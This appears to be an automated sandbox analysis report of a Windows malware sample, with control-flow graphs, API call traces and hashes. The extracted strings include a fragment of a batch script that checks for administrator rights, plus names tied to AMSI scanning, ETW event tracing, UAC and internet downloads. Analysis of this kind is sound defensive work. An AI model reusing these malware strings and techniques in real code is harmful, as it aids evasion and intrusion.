2754dbc call 2764f34 1284->1290 1290->1278 1365 2769a11-2769e29 call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc 1313->1365 1366 27698cf-27698de call 2754cb0 1313->1366 1314->1313 1323 27693f1-2769400 call 2754cb0 1314->1323 1323->1313 1332 2769406-276983c call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 27569d0 call 27645f8 call 27637e8 call 27637e0 call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754dbc call 2763f94 call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc 1323->1332 1332->1313 1704 2769e2e-276a65b call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 1365->1704 1366->1365 1375 27698e4-27698f3 call 2754cb0 1366->1375 1375->1365 1387 27698f9-2769a0c call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 call 27636cc call 2752fc4 call 2754dbc call 27648a4 1375->1387 1387->1365 1950 276a660-276a667 call 27636cc 1704->1950 1952 276a66c-276a6d4 call 2754c24 call 2754d64 call 2754a98 call 2754bb0 call 2754d64 call 2754a98 1950->1952 1964 276a6d9-276a6e0 call 27636cc 1952->1964 1966 276a6e5-276a707 call 2754a98 * 2 1964->1966 1970 276a70c-276a713 call 27636cc 1966->1970 1972 276a718-276a7ac call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc call 2754a98 * 2 call 27636cc 1970->1972 1990 276a7b1-276a7b3 call 2756878 1972->1990 1990->6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 0-1875472624
                                                                • Opcode ID: f338fa60ecae63a453a5614efbc70434a42ed98d760109734ead480fbe0c153c
                                                                • Instruction ID: 5011c995430a73522f94384114e61cb14ceaced48c07d2cff7e8b086a9406cb9
                                                                • Opcode Fuzzy Hash: f338fa60ecae63a453a5614efbc70434a42ed98d760109734ead480fbe0c153c
                                                                • Instruction Fuzzy Hash: 3D734475A012298BDB22FB54DC98ADEB3B6AF84300F5184E5A909B7614CF70EEC1DF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 027533C4 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5097 27533c4-27533dc 5098 27533de-27533f3 ReadFile 5097->5098 5099 2753438-2753444 call 2752d48 5097->5099 5100 27533f5-2753404 call 27511f8 call 2752d48 5098->5100 5101 2753406-2753418 5098->5101 5108 2753447-275344f 5099->5108 5100->5108 5104 2753424-2753427 5101->5104 5105 275341a-2753422 5101->5105 5104->5108 5109 2753429-2753436 call 2752d48 5104->5109 5105->5108 5109->5108
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027533EE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction ID: d1695c259c8ed4c18dd48cf87021176a314f9e4699da30460c453946e0dc00a0
                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction Fuzzy Hash: 1B111671B04128EFDB45DFA9D944A6EF7E9EF58690B1040A6EC08DB210D7B0DE11DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 027533C2 Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5114 27533c2-27533dc 5116 27533de-27533f3 ReadFile 5114->5116 5117 2753438-2753444 call 2752d48 5114->5117 5118 27533f5-2753404 call 27511f8 call 2752d48 5116->5118 5119 2753406-2753418 5116->5119 5126 2753447-275344f 5117->5126 5118->5126 5122 2753424-2753427 5119->5122 5123 275341a-2753422 5119->5123 5122->5126 5127 2753429-2753436 call 2752d48 5122->5127 5123->5126 5127->5126
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027533EE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction ID: b51b53eaa91472ff6366d11061f29533b522febce8a4895d5756ac20703f33bd
                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction Fuzzy Hash: 05F05471704228BFD705DAAADC84F6AF7ECDF546A1B1084A6FD08CB110E6B0DD00C670
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:8.2%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:924
                                                                Total number of Limit Nodes:12
                                                                execution_graph 16129 28867b8 16130 28867c3 16129->16130 16133 288455c 16130->16133 16132 28867fd 16134 28845a2 16133->16134 16135 2884620 16134->16135 16145 28844f4 16134->16145 16135->16132 16137 28847dd 16135->16137 16140 28847ee 16135->16140 16150 2884720 16137->16150 16139 28847e7 16139->16140 16141 2884833 FreeLibrary 16140->16141 16142 2884857 16140->16142 16141->16140 16143 2884860 16142->16143 16144 2884866 ExitProcess 16142->16144 16143->16144 16146 2884537 16145->16146 16147 2884504 16145->16147 16146->16135 16147->16146 16156 2885aa8 16147->16156 16160 28815fc 16147->16160 16151 288472a GetStdHandle WriteFile GetStdHandle WriteFile 16150->16151 16152 2884781 16150->16152 16151->16139 16154 288478a MessageBoxA 16152->16154 16155 288479d 16152->16155 16154->16155 16155->16139 16157 2885ab8 GetModuleFileNameA 16156->16157 16159 2885ad4 16156->16159 16164 2885d0c GetModuleFileNameA RegOpenKeyExA 16157->16164 16159->16147 16192 2881590 16160->16192 16162 2881604 VirtualAlloc 16163 288161b 16162->16163 16163->16147 16165 2885d8f 16164->16165 16166 2885d4f RegOpenKeyExA 16164->16166 16182 2885b48 16165->16182 16166->16165 16167 2885d6d RegOpenKeyExA 16166->16167 16167->16165 16169 2885e18 lstrcpyn GetThreadLocale GetLocaleInfoA 16167->16169 16171 2885f32 16169->16171 16175 2885e4f 16169->16175 16171->16159 16172 2885dd4 RegQueryValueExA 16173 2885df6 RegCloseKey 16172->16173 16176 2885df2 16172->16176 16173->16159 16173->16169 16174 2885e5f lstrlen 16177 2885e77 16174->16177 16175->16171 16175->16174 16176->16173 16177->16171 16178 2885e9c lstrcpyn LoadLibraryExA 16177->16178 16179 2885ec4 16177->16179 16178->16179 16179->16171 16180 2885ece lstrcpyn LoadLibraryExA 16179->16180 16180->16171 16181 2885f00 lstrcpyn LoadLibraryExA 16180->16181 16181->16171 16186 2885b6a 16182->16186 16183 2885cde RegQueryValueExA 16183->16172 16183->16173 16184 2885bfc lstrcpyn 16190 2885c1a 16184->16190 16185 2885cca lstrcpyn 16185->16183 16187 2885b9d lstrcpyn 16186->16187 16188 2885bb6 16186->16188 16187->16183 16188->16183 16188->16184 16189 2885c36 lstrcpyn 16189->16190 16190->16183 16190->16185 16190->16189 16191 2885c89 lstrcpyn lstrlen 16190->16191 16191->16190 16193 2881530 16192->16193 16193->16162 16194 288cb0a SetErrorMode 16195 289b0cc timeSetEvent 16196 2881abf 16197 2881ad1 16196->16197 16209 288173d 16196->16209 16198 2881ad7 16197->16198 16199 2881b43 Sleep 16197->16199 16200 2881bb1 16198->16200 16203 2881ae0 16198->16203 16206 2881b7b Sleep 16198->16206 16199->16198 16204 2881b5d Sleep 16199->16204 16210 2881c30 VirtualFree 16200->16210 16211 2881bd4 16200->16211 16201 2881718 16212 2881674 16201->16212 16202 2881c96 16204->16197 16206->16200 16208 2881b91 Sleep 16206->16208 16207 2881725 VirtualFree 16207->16209 16208->16198 16209->16196 16209->16198 16209->16201 16209->16202 16213 288167d 16212->16213 16214 28816b1 16212->16214 16213->16214 16215 288167f Sleep 16213->16215 16216 2881698 Sleep 16213->16216 16214->16207 16215->16213 16216->16213 16217 289b0c0 16220 2895de4 16217->16220 16219 289b0c8 16221 2895dec 16220->16221 16221->16221 16223 2895e0d 16221->16223 16222 289a7b8 16223->16222 16224 2895e26 16223->16224 16967 28936cc 16224->16967 16226 2895e40 16227 2895e4d 16226->16227 16228 28936cc 13 API calls 16227->16228 16229 2895e67 16228->16229 16230 2895e74 16229->16230 16231 28936cc 13 API calls 16230->16231 16232 2895e8e 16231->16232 16233 2895e9b 16232->16233 16234 28936cc 13 API calls 16233->16234 16235 2895eb5 16234->16235 16236 2895ec2 16235->16236 16237 28936cc 13 API calls 16236->16237 16238 2895ee2 16237->16238 16239 2895ef2 16238->16239 16240 28936cc 13 API calls 16239->16240 16241 2895f15 16240->16241 16242 2895f25 16241->16242 16243 28936cc 13 API calls 16242->16243 16244 2895f48 16243->16244 16245 2895f58 16244->16245 16246 28936cc 13 API calls 16245->16246 16247 2895f7b 16246->16247 16248 2895f8b 16247->16248 16249 28936cc 13 API calls 16248->16249 16250 2895fae 16249->16250 16251 2895fbe 16250->16251 16252 28936cc 13 API calls 16251->16252 16253 2895fe1 16252->16253 16254 2895ff1 16253->16254 16255 28936cc 13 API calls 16254->16255 16256 2896014 16255->16256 16257 2896024 16256->16257 16258 28936cc 13 API calls 16257->16258 16259 2896047 16258->16259 16260 2896057 16259->16260 16261 28936cc 13 API calls 16260->16261 16262 289607a 16261->16262 16263 289608a 16262->16263 16264 28936cc 13 API calls 16263->16264 16265 28960ad 16264->16265 16266 28960bd 16265->16266 16267 28936cc 13 API calls 16266->16267 16268 28960e0 16267->16268 16269 28960f0 16268->16269 16270 28936cc 13 API calls 16269->16270 16271 2896113 16270->16271 16272 2896123 16271->16272 16273 28936cc 13 API calls 16272->16273 16274 2896146 16273->16274 16275 2896156 16274->16275 16276 28936cc 13 API calls 16275->16276 16277 2896179 16276->16277 16278 2896189 16277->16278 16279 28936cc 13 API calls 16278->16279 16280 28961ac 16279->16280 16281 28961bc 16280->16281 16282 28936cc 13 API calls 16281->16282 16283 28961df 16282->16283 16284 28961ef 16283->16284 16285 28936cc 13 API calls 16284->16285 16286 2896212 16285->16286 16287 2896222 16286->16287 16288 28936cc 13 API calls 16287->16288 16289 2896245 16288->16289 16290 2896255 16289->16290 16291 28936cc 13 API calls 16290->16291 16292 2896278 16291->16292 16293 2896288 16292->16293 16294 28936cc 13 API calls 16293->16294 16295 28962ab 16294->16295 16296 28962bb 16295->16296 16297 28936cc 13 API calls 16296->16297 16298 28962de 16297->16298 16299 28962ee 16298->16299 16300 28936cc 13 API calls 16299->16300 16301 2896311 16300->16301 16302 2896321 16301->16302 16303 28936cc 13 API calls 16302->16303 16304 2896344 16303->16304 16305 2896354 16304->16305 16306 289636b 16305->16306 16307 28936cc 13 API calls 16306->16307 16308 2896377 16307->16308 16309 28936cc 13 API calls 16308->16309 16310 28963aa 16309->16310 16311 28963d1 16310->16311 16312 28936cc 13 API calls 16311->16312 16313 28963dd 16312->16313 16314 28936cc 13 API calls 16313->16314 16315 2896410 16314->16315 16316 28936cc 13 API calls 16315->16316 16317 2896443 16316->16317 16318 28936cc 13 API calls 16317->16318 16319 2896476 16318->16319 16320 28936cc 13 API calls 16319->16320 16321 28964a9 16320->16321 16322 28936cc 13 API calls 16321->16322 16323 28964dc 16322->16323 16324 28936cc 13 API calls 16323->16324 16325 289650f 16324->16325 16326 28936cc 13 API calls 16325->16326 16327 2896542 16326->16327 16328 28936cc 13 API calls 16327->16328 16329 2896575 16328->16329 16330 28936cc 13 API calls 16329->16330 16331 28965a8 16330->16331 16332 28936cc 13 API calls 16331->16332 16333 28965db 16332->16333 16334 28936cc 13 API calls 16333->16334 16335 289660e 16334->16335 16336 28936cc 13 API calls 16335->16336 16337 2896641 16336->16337 16338 28936cc 13 API calls 16337->16338 16339 2896674 16338->16339 16340 28936cc 13 API calls 16339->16340 16341 28966a7 16340->16341 16342 28936cc 13 API calls 16341->16342 16343 28966da 16342->16343 16344 28936cc 13 API calls 16343->16344 16345 289670d 16344->16345 16346 28936cc 13 API calls 16345->16346 16347 2896740 16346->16347 16348 28936cc 13 API calls 16347->16348 16349 2896773 16348->16349 16350 28936cc 13 API calls 16349->16350 16351 28967a6 16350->16351 16352 28967c5 16351->16352 16353 28967b4 16351->16353 16355 28848f4 8 API calls 16352->16355 16988 28848f4 16353->16988 16356 28967c3 16355->16356 16979 2884c24 16356->16979 16358 28967f4 16359 28936cc 13 API calls 16358->16359 16360 289684d 16359->16360 16361 2884c24 8 API calls 16360->16361 16362 289686d 16361->16362 16363 28936cc 13 API calls 16362->16363 16364 28968c6 16363->16364 16365 2884c24 8 API calls 16364->16365 16366 28968e6 16365->16366 16367 28936cc 13 API calls 16366->16367 16368 289693f 16367->16368 16369 2884c24 8 API calls 16368->16369 16370 289695f 16369->16370 16371 28936cc 13 API calls 16370->16371 16372 28969b8 16371->16372 16373 2882fc4 18 API calls 16372->16373 16374 28969cd 16373->16374 16375 28881e0 8 API calls 16374->16375 16376 28969de 16375->16376 16377 28848f4 8 API calls 16376->16377 16378 28969ee 16377->16378 16379 2884dc4 8 API calls 16378->16379 16380 2896a21 16379->16380 16381 2884c24 8 API calls 16380->16381 16382 2896a41 16381->16382 16383 28936cc 13 API calls 16382->16383 16384 2896a9a 16383->16384 16385 2896bb9 16384->16385 16386 2896aac 16384->16386 16387 2884c24 8 API calls 16385->16387 16388 2884c24 8 API calls 16386->16388 16390 2896bd9 16387->16390 16389 2896acc 16388->16389 16391 28936cc 13 API calls 16389->16391 16392 28936cc 13 API calls 16390->16392 16393 2896b25 16391->16393 16394 2896c32 16392->16394 16396 28836bc 11 API calls 16393->16396 16395 2884c24 8 API calls 16394->16395 16405 2896c52 16395->16405 16397 2896b4c 16396->16397 16398 2882d28 8 API calls 16397->16398 16399 2896b51 16398->16399 16400 28834cc 9 API calls 16399->16400 16401 2896b5b 16400->16401 16402 2882d28 8 API calls 16401->16402 16403 2896b60 16402->16403 16404 2884f90 8 API calls 16403->16404 16406 2896b6c 16404->16406 16407 28936cc 13 API calls 16405->16407 16408 2884dbc 8 API calls 16406->16408 16409 2896cab 16407->16409 16410 2896b92 16408->16410 16413 2882fc4 18 API calls 16409->16413 16411 2883454 10 API calls 16410->16411 16412 2896ba0 16411->16412 16415 2882d28 8 API calls 16412->16415 16414 2896cc0 16413->16414 16418 28836bc 11 API calls 16414->16418 16416 2896ba5 16415->16416 16417 2883474 8 API calls 16416->16417 16419 2896baf 16417->16419 16420 2896ce7 16418->16420 16421 2882d28 8 API calls 16419->16421 16422 2882d28 8 API calls 16420->16422 16423 2896bb4 16421->16423 16424 2896cec 16422->16424 16425 2884c24 8 API calls 16423->16425 16426 28834cc 9 API calls 16424->16426 16435 2896ffb 16425->16435 16427 2896cf6 16426->16427 16428 2882d28 8 API calls 16427->16428 16429 2896cfb 16428->16429 16430 2884f90 8 API calls 16429->16430 16431 2896d07 16430->16431 16432 2884dbc 8 API calls 16431->16432 16433 2896d2d 16432->16433 16434 2883454 10 API calls 16433->16434 16436 2896d3b 16434->16436 16438 28936cc 13 API calls 16435->16438 16437 2882d28 8 API calls 16436->16437 16439 2896d40 16437->16439 16440 2897054 16438->16440 16441 2883474 8 API calls 16439->16441 16442 2884c24 8 API calls 16440->16442 16443 2896d4a 16441->16443 16452 2897074 16442->16452 16444 2882d28 8 API calls 16443->16444 16445 2896d4f 16444->16445 16446 2895300 10 API calls 16445->16446 16447 2896d64 16446->16447 16448 2885a4c 10 API calls 16447->16448 16449 2896d7a 16448->16449 16450 28848f4 8 API calls 16449->16450 16451 2896d8d 16450->16451 16453 2895b34 8 API calls 16451->16453 16454 28936cc 13 API calls 16452->16454 16455 2896da9 16453->16455 16456 28970cd 16454->16456 16457 28848f4 8 API calls 16455->16457 16458 2884c24 8 API calls 16456->16458 16459 2896db9 16457->16459 16473 28970ed 16458->16473 16460 289521c InternetOpenA InternetOpenUrlA HttpQueryInfoA InternetCloseHandle InternetCloseHandle 16459->16460 16461 2896dc3 16460->16461 16462 2896e8e 16461->16462 16463 2895974 10 API calls 16461->16463 16464 28958b0 8 API calls 16462->16464 16465 2896ddb 16463->16465 16466 2896e98 16464->16466 16467 28848f4 8 API calls 16465->16467 16466->16423 16468 2895300 10 API calls 16466->16468 16469 2896deb Sleep 16467->16469 16470 2896eb5 16468->16470 16475 2896e05 16469->16475 16471 2885a4c 10 API calls 16470->16471 16472 2896ecb 16471->16472 16474 28848f4 8 API calls 16472->16474 16478 28936cc 13 API calls 16473->16478 16477 2896ede 16474->16477 16476 28936cc 13 API calls 16475->16476 16484 2896e28 16476->16484 16482 2895b34 8 API calls 16477->16482 16479 2897146 16478->16479 16480 28848f4 8 API calls 16479->16480 16481 2897155 16480->16481 16483 2884c24 8 API calls 16481->16483 16485 2896efa 16482->16485 16500 2897175 16483->16500 16487 28936cc 13 API calls 16484->16487 16486 28848f4 8 API calls 16485->16486 16488 2896f0a 16486->16488 16494 2896e5b 16487->16494 16489 289521c InternetOpenA InternetOpenUrlA HttpQueryInfoA InternetCloseHandle InternetCloseHandle 16488->16489 16490 2896f14 16489->16490 16491 2896f38 Sleep 16490->16491 16492 2896f18 16490->16492 16498 2896f52 16491->16498 16493 2895974 10 API calls 16492->16493 16495 2896f28 16493->16495 16497 28936cc 13 API calls 16494->16497 16496 28848f4 8 API calls 16495->16496 16496->16491 16497->16462 16499 28936cc 13 API calls 16498->16499 16504 2896f75 16499->16504 16501 28936cc 13 API calls 16500->16501 16502 28971ce 16501->16502 16503 28958b0 8 API calls 16502->16503 16506 28971d8 16503->16506 16505 28936cc 13 API calls 16504->16505 16508 2896fa8 16505->16508 16506->16222 16507 2895bdc 8 API calls 16506->16507 16509 28971fe 16507->16509 16511 28936cc 13 API calls 16508->16511 16510 28848f4 8 API calls 16509->16510 16512 289720e 16510->16512 16511->16423 16513 2895ac0 8 API calls 16512->16513 16514 289721e 16513->16514 16515 28848f4 8 API calls 16514->16515 16516 289722e 16515->16516 16517 2884c24 8 API calls 16516->16517 16518 289724e 16517->16518 16519 28936cc 13 API calls 16518->16519 16520 28972a7 16519->16520 16521 2895300 10 API calls 16520->16521 16522 28972ce 16521->16522 16523 2885a4c 10 API calls 16522->16523 16524 28972e4 16523->16524 16525 28848f4 8 API calls 16524->16525 16526 28972f7 16525->16526 16527 28848f4 8 API calls 16526->16527 16528 289730a 16527->16528 16529 28848f4 8 API calls 16528->16529 16530 289731d 16529->16530 16531 28848f4 8 API calls 16530->16531 16532 2897330 16531->16532 16533 28848f4 8 API calls 16532->16533 16534 2897343 16533->16534 16535 28848f4 8 API calls 16534->16535 16536 2897356 16535->16536 16537 28848f4 8 API calls 16536->16537 16538 2897369 16537->16538 16539 28848f4 8 API calls 16538->16539 16540 289737c 16539->16540 16541 28848f4 8 API calls 16540->16541 16542 289738f 16541->16542 16543 2884c24 8 API calls 16542->16543 16544 28973af 16543->16544 16545 28936cc 13 API calls 16544->16545 16546 2897408 16545->16546 16547 2884c24 8 API calls 16546->16547 16548 2897428 16547->16548 16549 28936cc 13 API calls 16548->16549 16550 2897481 16549->16550 16551 2884c24 8 API calls 16550->16551 16552 28974a1 16551->16552 16553 28936cc 13 API calls 16552->16553 16554 28974fa 16553->16554 16555 28848f4 8 API calls 16554->16555 16556 2897509 16555->16556 16557 2888134 GetFileAttributesA 16556->16557 16558 289752b 16557->16558 16559 2884dc4 8 API calls 16558->16559 16560 2897584 16559->16560 16561 2884c24 8 API calls 16560->16561 16562 28975a4 16561->16562 16563 28936cc 13 API calls 16562->16563 16565 28975fd 16563->16565 16564 2897cbb 16566 2884c24 8 API calls 16564->16566 16565->16564 16567 2895ac0 8 API calls 16565->16567 16571 2897cdb 16566->16571 16568 289762d 16567->16568 16569 2884c24 8 API calls 16568->16569 16570 2897648 16569->16570 16570->16564 16572 2884c24 8 API calls 16570->16572 16573 28936cc 13 API calls 16571->16573 16576 2897693 16572->16576 16574 2897d34 16573->16574 16575 2884c24 8 API calls 16574->16575 16578 2897d54 16575->16578 16577 28936cc 13 API calls 16576->16577 16579 28976ec 16577->16579 16581 28936cc 13 API calls 16578->16581 16580 2884c24 8 API calls 16579->16580 16584 289770c 16580->16584 16582 2897dad 16581->16582 16583 2884c24 8 API calls 16582->16583 16586 2897dcd 16583->16586 16585 28936cc 13 API calls 16584->16585 16587 2897765 16585->16587 16589 28936cc 13 API calls 16586->16589 16588 2884c24 8 API calls 16587->16588 16594 2897786 16588->16594 16590 2897e26 16589->16590 16591 2898705 16590->16591 16593 2884c24 8 API calls 16590->16593 16591->16219 16592 2884c24 8 API calls 16591->16592 16601 2898bca 16592->16601 16602 2897e5b 16593->16602 16595 28977d4 16594->16595 16597 28977ad 16594->16597 16596 2884c24 8 API calls 16595->16596 16599 28977fa 16596->16599 16598 2895698 10 API calls 16597->16598 16598->16595 16600 2884c24 8 API calls 16599->16600 16612 2897831 16600->16612 16604 28936cc 13 API calls 16601->16604 16602->16591 16603 2888134 GetFileAttributesA 16602->16603 16605 2897ea1 16603->16605 16606 2898c23 16604->16606 16607 2897ea9 16605->16607 16608 2898535 16605->16608 16609 2884c24 8 API calls 16606->16609 16610 2884c24 8 API calls 16607->16610 16611 2884c24 8 API calls 16608->16611 16616 2898c43 16609->16616 16617 2897ec9 16610->16617 16618 2898555 16611->16618 16613 28936cc 13 API calls 16612->16613 16614 289788a 16613->16614 16615 2884c24 8 API calls 16614->16615 16628 28978aa 16615->16628 16619 28936cc 13 API calls 16616->16619 16620 28936cc 13 API calls 16617->16620 16621 28936cc 13 API calls 16618->16621 16622 2898c9c 16619->16622 16623 2897f22 16620->16623 16624 28985ae 16621->16624 16625 2884c24 8 API calls 16622->16625 16626 2884c24 8 API calls 16623->16626 16627 2884c24 8 API calls 16624->16627 16631 2898cbc 16625->16631 16632 2897f42 16626->16632 16633 28985ce 16627->16633 16629 28936cc 13 API calls 16628->16629 16630 2897903 16629->16630 16634 2882fc4 18 API calls 16630->16634 16635 28936cc 13 API calls 16631->16635 16636 28936cc 13 API calls 16632->16636 16637 28936cc 13 API calls 16633->16637 16638 289791d 16634->16638 16639 2898d15 16635->16639 16640 2897f9b 16636->16640 16641 2898627 16637->16641 16645 2897928 CopyFileA 16638->16645 16642 2895580 8 API calls 16639->16642 16643 2884c24 8 API calls 16640->16643 16644 2884c24 8 API calls 16641->16644 16646 2898d2b 16642->16646 16656 2897fbb 16643->16656 16657 2898647 16644->16657 16649 289793e 16645->16649 16647 28848f4 8 API calls 16646->16647 16648 2898d3b 16647->16648 16651 2895b34 8 API calls 16648->16651 16650 28936cc 13 API calls 16649->16650 16654 2897961 16650->16654 16652 2898d57 16651->16652 16653 28848f4 8 API calls 16652->16653 16655 2898d67 16653->16655 16659 28936cc 13 API calls 16654->16659 16658 2895ac0 8 API calls 16655->16658 16662 28936cc 13 API calls 16656->16662 16663 28936cc 13 API calls 16657->16663 16660 2898d77 16658->16660 16669 2897994 16659->16669 16661 2895910 8 API calls 16660->16661 16664 2898d88 16661->16664 16665 2898014 16662->16665 16671 28986a0 16663->16671 16666 28848f4 8 API calls 16664->16666 16667 2884c24 8 API calls 16665->16667 16668 2898d98 16666->16668 16674 2898034 16667->16674 16670 2884c24 8 API calls 16668->16670 16672 28936cc 13 API calls 16669->16672 16686 2898db8 16670->16686 16675 2887c64 8 API calls 16671->16675 16673 28979c7 16672->16673 16676 289540c 8 API calls 16673->16676 16679 2884c24 8 API calls 16674->16679 16677 28986d5 16675->16677 16678 28979e2 16676->16678 16681 2884c24 8 API calls 16677->16681 16680 28848f4 8 API calls 16678->16680 16684 2898071 16679->16684 16682 28979f2 16680->16682 16681->16591 16683 2884c24 8 API calls 16682->16683 16692 2897a12 16683->16692 16685 2884c24 8 API calls 16684->16685 16690 28980ae 16685->16690 16687 28936cc 13 API calls 16686->16687 16688 2898e11 16687->16688 16689 2884c24 8 API calls 16688->16689 16695 2898e31 16689->16695 16691 2884c24 8 API calls 16690->16691 16697 28980e5 16691->16697 